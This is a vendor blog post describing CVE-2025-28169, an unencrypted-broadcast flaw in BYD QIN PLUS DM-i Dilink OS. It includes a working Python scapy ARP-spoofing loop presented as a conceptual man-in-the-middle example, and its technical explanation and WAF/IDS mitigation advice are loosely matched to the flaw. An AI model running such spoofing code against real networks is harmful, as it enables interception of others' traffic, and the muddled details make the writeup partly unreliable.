Ameeba Blog Logo
Ameeba Chat App store presentation
Download Ameeba Chat Today
Ameeba Blog Search

CVE-2025-28169: Unencrypted Broadcasts Lead to Potential Man-in-the-Middle Attacks on BYD QIN PLUS DM-i Dilink OS

Ameeba’s Mission: Safeguarding privacy by securing data and communication with our patented anonymization technology.

Overview

The CVE-2025-28169 vulnerability affects the Dilink OS v3.0_13.1.7.2204050.1 to v3.0_13.1.7.2312290.1_0 of the BYD QIN PLUS DM-i. It was discovered that the system sends unencrypted broadcasts to the manufacturer’s cloud server. This security flaw exposes the system to potential man-in-the-middle attacks. The severity of this vulnerability is significant due to its potential to compromise the system and leak sensitive data.

Vulnerability Summary

CVE ID: CVE-2025-28169
Severity: High, CVSS Score 8.1
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise and data leakage

Affected Products

Ameeba Chat – The World’s Most Private Chat App
No phone number, email, or personal info required.
Download App Now Learn More

Product | Affected Versions

BYD QIN PLUS DM-i Dilink OS | v3.0_13.1.7.2204050.1 to v3.0_13.1.7.2312290.1_0

How the Exploit Works

The exploit takes advantage of the unencrypted broadcasts that the Dilink OS sends to the manufacturer’s cloud server. By intercepting these broadcasts, an attacker can execute a man-in-the-middle attack. This attack could allow the attacker to eavesdrop on the communication, manipulate the data, or even impersonate the server to gain unauthorized access to sensitive information.

Conceptual Example Code

Here is a conceptual example of a man-in-the-middle attack using Python:

import scapy.all as scapy
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
return answered_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)
target_ip = "10.0.2.7"
gateway_ip = "10.0.2.1"
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)

In this example, the attacker spoofs the IP of the manufacturer’s cloud server (gateway_ip) and the IP of the Dilink OS (target_ip). The attacker then sends ARP responses to both targets, tricking them into believing that they are communicating with each other, while in reality, all their communication is going through the attacker’s machine.

Mitigation

The recommended mitigation for this vulnerability is to apply the vendor’s patch. If a patch is not available, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) could serve as temporary mitigation. These systems can help detect and prevent man-in-the-middle attacks by monitoring network traffic and identifying suspicious activity.
Remember, always stay vigilant and keep your systems updated to protect against the latest vulnerabilities.

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.

Ameeba Chat
The world’s most private
chat app

No phone number, email, or personal info required. Stay anonymous with encrypted messaging and customizable aliases.

Download Now Learn More

More posts